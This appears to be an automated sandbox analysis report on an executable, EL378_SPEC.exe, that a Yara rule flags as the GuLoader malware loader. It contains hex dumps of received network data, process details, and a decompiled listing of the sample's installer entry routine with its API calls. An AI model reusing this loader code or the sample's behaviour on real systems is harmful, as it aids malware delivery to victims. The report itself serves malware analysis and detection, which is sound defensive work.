2023-08-14 11:02:43 UTC	102	IN	Data Raw: ac bc 9e 42 85 6a ec 28 a9 53 e9 fe 65 3f 53 0e ff 09 19 2f a1 98 84 b4 d1 41 8a 6d 20 46 fc 2c 24 a8 25 20 84 46 ce e4 18 06 3a 23 6b 71 bd 4b 70 e9 78 58 82 e5 a7 04 ce cf e2 41 1e 7d b0 07 80 b1 3e e8 81 59 78 c2 dc 4f ba 9e 41 44 4f a5 5e 9f 2c 43 4f fd b8 95 06 d7 7d 2b 7a 81 16 70 15 43 b2 fe a0 2e 77 a5 99 21 9c 3a 27 57 9f 18 58 4c c4 81 c9 9e d7 27 54 68 c0 c1 c6 73 ce 91 45 84 8c 79 0e 43 f7 7c 80 23 82 17 f1 ec 57 e2 68 dc 2a e7 ae 48 f1 32 98 93 25 be 8a b8 8b 22 3b b9 91 6d d3 3b 39 5a 79 df 07 f2 8a 56 ac e5 95 81 28 68 6f fd 07 18 2b 90 15 1b a1 d9 a0 43 95 df 68 74 7e 05 cd ec bd 2b 52 ca b7 07 8a f5 80 10 ee c2 e9 73 c5 60 cc 8d a9 00 72 51 96 8c af c9 0b 6e 43 b7 4c e2 e8 4e 90 f7 67 7a c3 34 b8 09 62 2a 41 44 6b af 5e 6d e6 49 0a 8b 35 Data Ascii: Bj(Se?S/Am F,$% F:#kqKpxXA}>YxOADO^,CO}+zpC.w!:'WXL'ThsEyC\|#WhH2%";m;9ZyV(ho+Cht~+Rs`rQnCLNgz4bADk^mI5
2023-08-14 11:02:43 UTC	104	IN	Data Raw: 21 f7 fb 47 8f f8 5b ec 40 03 1e 0c 43 6d e8 cf eb c0 8e 66 fa 65 f6 45 11 86 19 14 a0 4b b0 15 9e e8 29 8a 0b 68 33 6f 7d 9d e0 9f de e0 c9 a7 2a d3 d3 b0 c8 2d b3 b3 ff 32 af 4f d4 8e 41 88 86 20 ab 7c f1 6a 66 69 e3 bc 6a 87 a6 89 e0 9d fe ef 06 20 5e 6c fa a1 e7 e9 b7 4c f3 65 7e 73 2d 08 60 2d 66 76 92 39 ab 2b 07 6c 63 03 1f e3 73 dc 9b 71 3f 0d ac bf ea 84 83 b2 7e 7f d2 6b 46 d1 7d e8 7d 6c 68 02 f3 6c 69 66 b2 de 5f bf 86 9b 92 62 93 fd 3f 57 72 e4 34 ff 11 0e ec 7f 0a 5d 15 ad 0a 4b 11 f7 be 08 39 cf fe 25 01 fe 04 cb 11 40 cd b9 92 57 d0 02 2a 10 c8 13 fd 19 2c ea b5 a1 21 3a f4 29 34 84 bd f0 23 43 1e c2 25 84 aa 23 26 31 8d 3d b8 00 0b c4 4d 27 6b 8b 46 64 fe 03 ab 7c 14 7e 93 99 59 37 c6 27 47 8b 9c b6 bb a2 4e 09 fe ba 4d 8f b8 07 e3 ae 96 Data Ascii: !G[@CmfeEK)h3o}-2OA \|jfij ^lLe~s-`-fv9+lcsq?~kF}}lhlif_b?Wr4]K9%@W,!:)4#C%#&1=M'kFd\|~Y7'GNM
2023-08-14 11:02:43 UTC	105	IN	Data Raw: eb a1 72 fa 4e 08 a3 79 2c 40 42 ac 68 4d df e6 fb 48 2c d7 83 39 a9 56 b8 23 62 94 68 aa dd fc c1 0f 5e 20 3a 82 31 c3 aa 28 cf 3d fa b5 9f bb 8f a2 6c c0 a0 0e b8 19 c6 f5 8f 01 18 6f 36 e6 9f ce d3 7b db bc a1 5d 7c e4 31 5d 73 f8 fc f6 e5 4c d6 1f c1 3e 33 78 9c 7b f7 c6 e6 e8 a4 b3 d9 5c 5b 7c 8e 81 3a b0 71 87 33 81 bb 02 78 bb e7 2b 0e e0 38 62 5c 75 39 28 24 b5 68 80 d6 1b 62 a2 b0 f1 32 49 ed b7 18 52 b2 cf fa dd 02 77 f5 5f 30 8e a0 18 41 e4 73 05 9d 05 f4 b4 b4 8d 08 22 5c 39 37 a7 00 1a 20 54 94 58 ef 18 0f 86 c2 8d b9 b5 9e 27 a3 35 94 a3 eb f4 0e 20 a9 37 a4 cd c3 58 76 34 15 00 c0 b8 5e e2 84 54 61 87 07 57 2c cb bf 6b c0 57 cf ac 25 f4 8d 1e 34 01 3d d1 7f 2e 76 59 a6 f3 a0 49 88 46 32 8a 28 5b e0 b5 17 ff 38 fa 09 32 a1 3b 7d 76 93 43 5e Data Ascii: rNy,@BhMH,9V#bh^ :1(=lo6{]\|1]sL>3x{\[\|:q3x+8b\u9($hb2IRw_0As"\97 TX'5 7Xv4^TaW,kW%4=.vYIF2([82;}vC^
2023-08-14 11:02:43 UTC	106	IN	Data Raw: 35 1d e8 e4 ae 78 05 cc c5 78 d1 78 bb ad 15 b1 a4 93 6c 5b 7a 7a d7 ac 8f 93 5d 65 77 7e a9 da 24 9d 71 b6 fb 75 18 03 45 a4 3b b6 be 9d 6f bc 8a 95 9b b1 19 6e 0a 6c d7 1f 7c a1 1c 3c 69 1b 78 61 3c c1 89 8b a6 6c 74 4f e2 3c 4a b4 58 32 c9 2a f5 96 a5 24 67 71 0f 09 cb 3e 70 f3 5e 51 0e 15 a6 80 58 97 f6 83 82 22 10 b0 b0 48 11 dc bb 37 9a 0c 3f 73 bd aa 1a 3e e2 8a 8a 7c e8 73 59 6b af 66 6c 3c 8f 33 b9 a7 fa 01 69 63 43 e8 ea 75 47 65 5c 60 f2 00 88 18 f0 bf 17 92 27 af 61 a4 dc 9a 04 79 3a dc cd 4f f0 b0 53 1c 31 dd 66 76 ce 10 1b 25 0b 0d f1 c9 d6 4c c5 1e 11 9f 97 7f 7b 94 75 fd cc 29 62 8a f7 b5 db c2 d2 40 56 4d 90 1b e7 11 20 ec 89 53 d3 42 a6 dd 4a 17 6f 01 2d 01 ca 21 be ce 62 8d c0 64 c6 be ca 08 65 2f bf 90 2f f6 4b b9 48 d1 28 45 fc cc db Data Ascii: 5xxxl[zz]ew~$quE;onl\|<ixa<ltO<JX2*$gq>p^QX"H7?s>\|sYkfl<3icCuGe\`'ay:OS1fv%L{u)b@VM SBJo-!bde//KH(E
2023-08-14 11:02:43 UTC	107	IN	Data Raw: 96 7c 6c ed be 5b cb c7 89 d9 26 fa 03 b1 96 83 8b d7 ac 8e 81 4c 34 02 35 ed 40 59 8c cc 6f f8 49 e1 c0 a7 fa 8e 27 c7 e7 ba bc da 41 7d ef 90 39 76 df 4b af c3 83 04 87 82 fd d1 0b f6 8c 24 1f fd ed a4 b2 0f 5d 1e 39 9b 36 b0 c4 c4 0e 69 bc 86 3e 73 19 e3 fe ba 9e 45 ac f5 70 1c bb 46 42 18 fe 90 a5 c2 6c a0 da 80 72 4d 40 97 f2 a1 4b 97 b2 11 0a 73 7c 2e 3e 4c 80 f3 f0 31 e9 a3 ed d8 8d 42 44 bd 22 0c 39 28 9e 62 a9 fa 96 1e 17 54 9d e0 85 8c 1b 27 3f c4 ba df 7a 38 ca a4 97 0a 64 97 d8 df 79 2e 87 61 ca 88 90 cb 08 ba 3b 97 3b c8 98 de 55 e1 68 c2 9e fe 18 07 cd 35 07 a4 d9 62 6d c8 9d fe c9 fb 1e 1f 28 5c a0 44 ad 73 09 3f 31 b5 ff a9 ac 22 c1 9d 1d 41 a3 a7 60 b6 c3 82 18 7e 19 94 76 ec 18 1a 91 2e 9f c3 3e f2 b0 35 32 ac bc 9e 42 85 6a ec 28 a9 53 Data Ascii: \|l[&L45@YoI'A}9vK$]96i>sEpFBlrM@Ks\|.>L1BD"9(bT'?z8dy.a;;Uh5bm(\Ds?1"A`~v.>52Bj(S
2023-08-14 11:02:43 UTC	108	IN	Data Raw: 5e 26 77 c9 5b b1 f6 c8 ef f2 ae c9 92 f7 f2 f0 00 66 5e bf d9 e4 58 ae ed a2 dc e1 cb 15 79 76 79 75 c3 3d 3f 47 7b d4 be b7 d4 64 f4 ad 2d 9f 44 dc fd 52 85 7e 6f e7 41 aa ca 10 06 81 b2 44 81 ad f9 b1 71 52 d9 5c 42 f4 2b dc 12 09 f2 07 ce 62 5e 74 31 93 79 c3 82 e4 bb 5c 25 2d c8 83 14 0d 4f 1c 91 00 96 60 57 1f 20 57 37 97 2c 9e 61 81 bf 0d e9 25 78 d6 b6 06 dc 8c 02 d5 09 b2 01 d0 34 41 18 3d c9 88 ad 92 f1 b0 36 d9 dc cf 63 b5 a0 51 39 74 fb 62 d1 f7 57 0b 3c 59 ff 71 ea 89 af 90 69 20 91 ed 34 3c 0f a6 a4 5a 69 ae 2c b2 89 fe 86 b1 68 61 47 5a 47 a5 39 b7 b4 fe 80 c3 84 75 79 50 9a 3a 5e 3b a5 11 b2 0e 91 01 b7 5a 59 9c 2b 27 94 40 80 b5 3c 59 40 32 26 e8 f7 cb 5f 84 30 bb ec bf 04 b0 e8 5e 51 67 ac 35 fe 3f ec 90 a0 21 f7 fb 47 8f f8 5b ec 40 03 Data Ascii: ^&w[f^Xyvyu=?G{d-DR~oADqR\B+b^t1y\%-O`W W7,a%x4A=6cQ9tbW<Yqi 4<Zi,haGZG9uyP:^;ZY+'@<Y@2&_0^Qg5?!G[@
2023-08-14 11:02:43 UTC	110	IN	Data Raw: db ef b8 38 96 0b 42 a2 55 62 9e 1e 63 67 a5 5e 6d bd 4c 13 7b 6a 7d d0 ee a6 e5 55 d5 41 8c 58 8b 3a 31 9c ac 07 50 b4 26 34 66 dc 60 17 02 19 28 ca f3 16 11 54 55 86 9b 6f 5a 29 25 89 9e ca 9f 15 b7 5c c1 5f fb 7f 22 cb 28 0a 6c 6a 75 ef 65 0a 25 2c d6 9e 52 a1 9c 52 ff d9 b3 13 8c 88 c0 91 b9 ba 0b c1 3c fd b1 51 33 c1 94 f0 74 6b cb 1f 8c ce 97 44 ae ae 80 ac c5 28 85 95 4f 81 9b 4b 2a b3 06 44 6f ff d2 9c 32 12 03 c0 fd fc ec e9 d5 6b d1 e0 12 c9 89 65 72 3a 59 de c1 78 38 24 64 10 01 91 c3 02 57 21 e0 e7 11 4a e9 5d 65 c2 ec c0 d8 1d 4b 35 91 49 ee d1 dd 46 16 d5 37 98 9e 88 78 17 0c d0 40 fa 35 0f 7a e0 46 9e fa ad 3a ff da 92 d7 e7 4d 08 e2 4d 8b 23 7b b0 ef 04 f5 71 a5 71 02 26 09 f7 39 fa 8d d3 8b 71 63 51 d1 29 97 eb a1 72 fa 4e 08 a3 79 2c 40 Data Ascii: 8BUbcg^mL{j}UAX:1P&4f`(TUoZ)%\_"(ljue%,RR<Q3tkD(OK*Do2ker:Yx8$dW!J]eK5IF7x@5zF:MM#{qq&9qcQ)rNy,@

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EL378_SPEC.exePID: 7376, Parent PID: 5300

General

Target ID:	0
Start time:	13:02:05
Start date:	14/08/2023
Path:	C:\Users\user\Desktop\EL378_SPEC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\EL378_SPEC.exe
Imagebase:	0x400000
File size:	598'968 bytes
MD5 hash:	3BDBF0495A23287DDD05975E5E3B33F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.14991153251.00000000066B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: EL378_SPEC.exePID: 7372, Parent PID: 7376

General

Target ID:	2
Start time:	13:02:29
Start date:	14/08/2023
Path:	C:\Users\user\Desktop\EL378_SPEC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\EL378_SPEC.exe
Imagebase:	0x400000
File size:	598'968 bytes
MD5 hash:	3BDBF0495A23287DDD05975E5E3B33F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: EL378_SPEC.exePID: 7376, Parent PID: 5300COMMON

Execution Graph

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.3%
Total number of Nodes:	1455
Total number of Limit Nodes:	40

Executed Functions

Function 004036FC Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			_entry_() {
				char _v694;
				struct _SHFILEINFOW _v696;
				signed char _v700;
				intOrPtr _v930;
				struct _OSVERSIONINFOW _v976;
				long _v1004;
				struct _TOKEN_PRIVILEGES _v1016;
				intOrPtr _v1020;
				void* _v1024;
				int _v1028;
				intOrPtr _v1036;
				signed short* _v1048;
				signed int _t45;
				intOrPtr* _t58;
				signed int _t71;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t83;
				WCHAR* _t91;
				void* _t95;
				void* _t103;
				void* _t107;
				void* _t113;
				signed short _t124;
				intOrPtr* _t126;
				signed short _t128;
				void* _t131;
				intOrPtr* _t132;
				void* _t136;
				signed char _t137;
				void* _t140;
				WCHAR* _t141;
				int _t143;
				void* _t144;
				signed int _t149;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed char _t156;
				signed int _t158;
				signed short _t159;
				void* _t160;
				int _t161;
				CHAR* _t163;
				intOrPtr _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				signed int _t173;
				signed int _t175;
				int _t176;

				_t161 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v1004 = 0;
				_t175 = 0; // executed
				SetErrorMode(0x8001); // executed
				asm("xorps xmm0, xmm0");
				_v976.szCSDVersion = 0;
				asm("movlpd [esp+0x144], xmm0");
				_v976.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v976) != 0) {
					_t156 = _v694;
				} else {
					_v976.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v976);
					_t136 = 0x53;
					_t156 = 4;
					_v694 = 4;
					if(_v976.szCSDVersion != _t136) {
						_t137 = 0;
					} else {
						_t137 = _v930 + 0xffffffd0;
					}
					_v700 = _t137;
				}
				if(_v976.dwMajorVersion >= 0xa) {
					_t45 = _v976.dwBuildNumber;
				} else {
					_t45 = _v976.dwBuildNumber & 0x0000ffff;
					_v976.dwBuildNumber = _t45;
				}
				 *0x435af8 = _t45;
				_t149 = ((_v976.dwMajorVersion & 0x000000ff) << 0x00000008 & 0x0000ffff | _v976.dwMinorVersion & 0x000000ff) << 0x00000010 | (_v700 & 0x000000ff) << 0x00000008 & 0x0000ffff | _t156 & 0x000000ff;
				 *0x435afc = _t149;
				if(_t149 >> 0x10 != 0x600) {
					_t132 = E004068E6(0);
					if(_t132 != 0) {
						 *_t132(0xc00);
					}
				}
				_t163 = "UXTHEME";
				do {
					E0040619E(_t163); // executed
					_t163 =  &(( &(_t163[1]))[lstrlenA(_t163)]);
				} while ( *_t163 != 0);
				E004068E6(0xb);
				 *0x4349f0 = E004068E6(9);
				_t58 = E004068E6(7);
				if(_t58 != 0) {
					_t58 =  *_t58(0x1e);
					if(_t58 != 0) {
						 *0x435afc =  *0x435afc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x435a60 = _t58;
				SHGetFileInfoW(0x4095b0, 0,  &_v696, 0x2b4, 0); // executed
				E00406B1A(0x434a00, L"NSIS Error");
				E00406B1A(L"\"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe\"", GetCommandLineW());
				_t165 = 0x22;
				_push("true");
				_pop(_t140);
				 *0x4349f4 = 0x400000;
				_v1036 = _t165;
				_t65 =  !=  ? _t140 : _t165;
				_t66 = ( !=  ? _t140 : _t165) & 0x0000ffff;
				_t68 =  ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe\"";
				_t152 = CharNextW(E004065F6( ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe\"", ( !=  ? _t140 : _t165) & 0x0000ffff));
				_v1048 = _t152;
				_t71 =  *_t152 & 0x0000ffff;
				if(_t71 == 0) {
					L40:
					_t141 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t141);
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags != 0) {
						L43:
						DeleteFileW(L"1033"); // executed
						_t161 = E004033ED(__eflags, _t175);
						_t176 = 0;
						__eflags = _t161;
						if(_t161 != 0) {
							L71:
							_t143 = _v1028;
							L72:
							E004036D2();
							__imp__OleUninitialize();
							__eflags = _t161;
							if(_t161 == 0) {
								__eflags =  *0x435ad4;
								if( *0x435ad4 == 0) {
									L82:
									__eflags =  *0x435aec - 0xffffffff;
									ExitProcess(_t143);
									L74:
								}
								_t79 = OpenProcessToken(GetCurrentProcess(), "true",  &_v1024);
								__eflags = _t79;
								if(_t79 != 0) {
									LookupPrivilegeValueW(_t176, L"SeShutdownPrivilege",  &(_v1016.Privileges));
									_v1016.PrivilegeCount = 1;
									_v1004 = 2;
									AdjustTokenPrivileges(_v1024, _t176,  &_v1016, _t176, _t176, _t176);
								}
								_t80 = E004068E6("true");
								__eflags = _t80;
								if(_t80 == 0) {
									L80:
									_t81 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t81;
									if(_t81 != 0) {
										goto L82;
									}
									goto L81;
								} else {
									_t83 =  *_t80(_t176, _t176, _t176, 0x25, 0x80040002);
									__eflags = _t83;
									if(_t83 == 0) {
										L81:
										E00401533(9);
										goto L82;
									}
									goto L80;
								}
							}
							E00406AA8(_t161, 0x200010);
							ExitProcess(2);
							goto L74;
						}
						__eflags =  *0x435a04;
						if( *0x435a04 == 0) {
							L53:
							 *0x435aec =  *0x435aec | 0xffffffff;
							_t143 = E00405A3E();
							goto L72;
						}
						_t168 = E004065F6(L"\"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe\"", 0);
						_t91 = L"\"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe\"";
						while(1) {
							__eflags = _t168 - _t91;
							if(_t168 < _t91) {
								break;
							}
							__eflags =  *_t168 - 0x5f0020;
							if( *_t168 != 0x5f0020) {
								L48:
								_t168 = _t168 - 2;
								__eflags = _t168;
								continue;
							}
							__eflags =  *((intOrPtr*)(_t168 + 4)) - 0x3d003f;
							if( *((intOrPtr*)(_t168 + 4)) == 0x3d003f) {
								break;
							}
							goto L48;
						}
						_t161 = L"Error launching installer";
						__eflags = _t168 - _t91;
						if(__eflags < 0) {
							_t169 = E004064FC();
							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"~nsu");
							__eflags = _t169;
							if(_t169 != 0) {
								lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", "A");
							}
							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L".tmp");
							_t95 = lstrcmpiW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"C:\\Users\\Arthur\\Desktop");
							__eflags = _t95;
							if(_t95 == 0) {
								L69:
								_t143 = _t176;
								goto L72;
							} else {
								_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
								__eflags = _t169;
								if(_t169 == 0) {
									E00405E1E();
								} else {
									E00405E3E();
								}
								SetCurrentDirectoryW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
								__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring" - _t176; // 0x43
								if(__eflags == 0) {
									E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", L"C:\\Users\\Arthur\\Desktop");
								}
								E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", _v1024);
								L"74420235" = 0x41;
								_t170 = 0x1a;
								do {
									_push( *((intOrPtr*)( *0x435a10 + 0x120)));
									_push(0x42b538);
									E00405EBA();
									DeleteFileW(0x42b538);
									__eflags = _t161;
									if(_t161 != 0) {
										_t103 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe", 0x42b538, "true");
										__eflags = _t103;
										if(_t103 != 0) {
											E0040623D(0x42b538, _t176);
											_push( *((intOrPtr*)( *0x435a10 + 0x124)));
											_push(0x42b538);
											E00405EBA();
											_t107 = E004066D6(0x42b538);
											__eflags = _t107;
											if(_t107 != 0) {
												CloseHandle(_t107);
												_t161 = _t176;
											}
										}
									}
									L"74420235" =  &(L"74420235"[0]);
									_t170 = _t170 - 1;
									__eflags = _t170;
								} while (_t170 != 0);
								E0040623D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", _t176);
								goto L69;
							}
						}
						 *_t168 = 0;
						_t171 = _t168 + 8;
						_t113 = E00406638(__eflags, _t168 + 8);
						__eflags = _t113;
						if(_t113 == 0) {
							goto L69;
						}
						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t171);
						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t171);
						_t161 = _t176;
						goto L53;
					}
					GetWindowsDirectoryW(_t141, 0x3fb);
					lstrcatW(_t141, L"\\Temp");
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags != 0) {
						goto L43;
					}
					GetTempPathW(0x3fc, _t141);
					lstrcatW(_t141, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t141);
					SetEnvironmentVariableW(L"TMP", _t141);
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags == 0) {
						_t176 = 0;
						__eflags = 0;
						goto L71;
					}
					goto L43;
				} else {
					_t173 = _t71;
					while(1) {
						_t124 = _t173 & 0x0000ffff;
						if(_t173 != _t140) {
							goto L21;
						} else {
							goto L20;
						}
						do {
							L20:
							_t152 =  &(_t152[1]);
							_t124 =  *_t152 & 0x0000ffff;
						} while (_t124 == _t140);
						L21:
						_t158 = _t124 & 0x0000ffff;
						if(_t124 == _v1020) {
							_t158 = _t152[1] & 0x0000ffff;
							_t131 = 0x22;
							_t140 = _t131;
						}
						_t25 =  &(_t152[1]); // 0x0
						_t126 =  !=  ? _t152 : _t25;
						if(_t158 != 0x2f) {
							L35:
							_t152 = E004065F6(_t126, _t140);
							_t144 = 0x22;
							_t128 =  *_t152 & 0x0000ffff;
							_t159 = _t128;
							if(_t128 == _t144) {
								_t152 =  &(_t152[1]);
								_t159 =  *_t152 & 0x0000ffff;
							}
							_t173 = _t159 & 0x0000ffff;
							if(_t159 == 0) {
								goto L40;
							} else {
								_push("true");
								_pop(_t140);
								continue;
							}
						} else {
							_t126 = _t126 + 2;
							_t153 = 0x53;
							_push("true");
							_pop(_t160);
							if( *_t126 == _t153) {
								_t155 =  *(_t126 + 2) & 0x0000ffff;
								if(_t155 == _t160 || _t155 == 0) {
									 *0x435ae0 = 1;
								}
							}
							if( *_t126 == 0x43004e &&  *(_t126 + 4) == 0x430052) {
								_t154 =  *(_t126 + 8) & 0x0000ffff;
								if(_t154 == _t160 || _t154 == 0) {
									_t175 = _t175 | 0x00000004;
								}
							}
							if( *((intOrPtr*)(_t126 - 4)) != 0x2f0020 ||  *_t126 != 0x3d0044) {
								goto L35;
							} else {
								_t152 = 0;
								 *((short*)(_t126 - 4)) = 0;
								__eflags = _t126 + 4;
								E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t126 + 4);
								goto L40;
							}
						}
					}
				}
			}

0x00403708
0x00403712
0x00403716
0x00403718
0x00403728
0x0040372b
0x00403730
0x00403739
0x00403745
0x0040377e
0x00403747
0x0040374b
0x00403754
0x00403758
0x00403759
0x0040375b
0x00403767
0x0040377a
0x00403769
0x0040376d
0x0040376d
0x00403770
0x00403770
0x0040378a
0x00403797
0x0040378c
0x0040378c
0x00403791
0x00403791
0x0040379b
0x004037ca
0x004037d1
0x004037dd
0x004037e0
0x004037e7
0x004037ee
0x004037ee
0x004037e7
0x004037f0
0x004037f5
0x004037f6
0x00403803
0x00403805
0x0040380b
0x00403819
0x0040381e
0x00403825
0x00403829
0x0040382d
0x0040382f
0x0040382f
0x0040382d
0x00403836
0x0040383d
0x00403849
0x0040385c
0x0040386c
0x0040387d
0x00403890
0x00403891
0x00403893
0x00403897
0x004038a3
0x004038a7
0x004038aa
0x004038b3
0x004038c3
0x004038c5
0x004038c9
0x004038cf
0x004039aa
0x004039b0
0x004039bb
0x004039c2
0x004039c4
0x00403a1c
0x00403a27
0x00403a2f
0x00403a31
0x00403a33
0x00403a35
0x00403be6
0x00403be6
0x00403bea
0x00403bea
0x00403bef
0x00403bf5
0x00403bf7
0x00403c0c
0x00403c13
0x00403c91
0x00403c91
0x00403c06
0x00403c06
0x00403c06
0x00403c23
0x00403c29
0x00403c2b
0x00403c38
0x00403c45
0x00403c53
0x00403c5b
0x00403c5b
0x00403c63
0x00403c6d
0x00403c6f
0x00403c7d
0x00403c80
0x00403c86
0x00403c88
0x00000000
0x00000000
0x00000000
0x00403c71
0x00403c77
0x00403c79
0x00403c7b
0x00403c8a
0x00403c8c
0x00000000
0x00403c8c
0x00000000
0x00403c7b
0x00403c6f
0x00403bff
0x00403c06
0x00000000
0x00403c06
0x00403a3b
0x00403a41
0x00403aa6
0x00403aa6
0x00403ab2
0x00000000
0x00403ab2
0x00403a4e
0x00403a50
0x00403a6b
0x00403a6b
0x00403a6d
0x00000000
0x00000000
0x00403a57
0x00403a5d
0x00403a68
0x00403a68
0x00403a68
0x00000000
0x00403a68
0x00403a5f
0x00403a66
0x00000000
0x00000000
0x00000000
0x00403a66
0x00403a6f
0x00403a74
0x00403a76
0x00403ac8
0x00403aca
0x00403acf
0x00403ad1
0x00403add
0x00403add
0x00403aec
0x00403afb
0x00403b01
0x00403b03
0x00403be0
0x00403be0
0x00000000
0x00403b09
0x00403b09
0x00403b0e
0x00403b10
0x00403b19
0x00403b12
0x00403b12
0x00403b12
0x00403b23
0x00403b29
0x00403b30
0x00403b3c
0x00403b3c
0x00403b4a
0x00403b51
0x00403b5b
0x00403b5c
0x00403b61
0x00403b67
0x00403b6c
0x00403b76
0x00403b78
0x00403b7a
0x00403b88
0x00403b8e
0x00403b90
0x00403b98
0x00403ba2
0x00403ba8
0x00403bad
0x00403bb7
0x00403bbc
0x00403bbe
0x00403bc1
0x00403bc7
0x00403bc7
0x00403bbe
0x00403b90
0x00403bc9
0x00403bd0
0x00403bd0
0x00403bd0
0x00403bdb
0x00000000
0x00403bdb
0x00403b03
0x00403a7a
0x00403a7d
0x00403a81
0x00403a86
0x00403a88
0x00000000
0x00000000
0x00403a94
0x00403a9f
0x00403aa4
0x00000000
0x00403aa4
0x004039cc
0x004039d8
0x004039e2
0x004039e4
0x00000000
0x00000000
0x004039ec
0x004039f4
0x00403a05
0x00403a0d
0x00403a14
0x00403a16
0x00403be4
0x00403be4
0x00000000
0x00403be4
0x00000000
0x004038d5
0x004038d5
0x004038d7
0x004038d7
0x004038dd
0x00000000
0x00000000
0x00000000
0x00000000
0x004038df
0x004038df
0x004038df
0x004038e2
0x004038e5
0x004038ea
0x004038ed
0x004038f5
0x004038f7
0x004038fd
0x004038fe
0x004038fe
0x00403905
0x00403908
0x0040390f
0x0040396a
0x00403971
0x00403975
0x00403976
0x00403979
0x0040397e
0x00403980
0x00403983
0x00403983
0x00403986
0x0040398c
0x00000000
0x0040398e
0x0040398e
0x00403990
0x00000000
0x00403990
0x00403911
0x00403913
0x00403916
0x00403917
0x00403919
0x0040391d
0x0040391f
0x00403926
0x0040392d
0x0040392d
0x00403926
0x0040393d
0x00403948
0x0040394f
0x00403956
0x00403956
0x0040394f
0x00403960
0x00000000
0x00403996
0x00403996
0x00403998
0x0040399c
0x004039a5
0x00000000
0x004039a5
0x00403960
0x0040390f
0x004038d7

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403718
GetVersionExW.KERNEL32 ref: 00403741
GetVersionExW.KERNEL32(?), ref: 00403754
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037FC
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403836
OleInitialize.OLE32(00000000), ref: 0040383D
SHGetFileInfoW.SHELL32(004095B0,00000000,?,000002B4,00000000), ref: 0040385C
GetCommandLineW.KERNEL32(00434A00,NSIS Error), ref: 00403871
CharNextW.USER32(00000000,"C:\Users\user\Desktop\EL378_SPEC.exe",?,"C:\Users\user\Desktop\EL378_SPEC.exe",00000000), ref: 004038BD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004039BB
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039CC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039EC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403A05
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A0D
DeleteFileW.KERNELBASE(1033), ref: 00403A27

Part of subcall function 004033ED: GetTickCount.KERNEL32 ref: 00403400
Part of subcall function 004033ED: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EL378_SPEC.exe,00000400,?,?,?,?,?), ref: 0040341C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403ACA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409600), ref: 00403ADD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403AEC
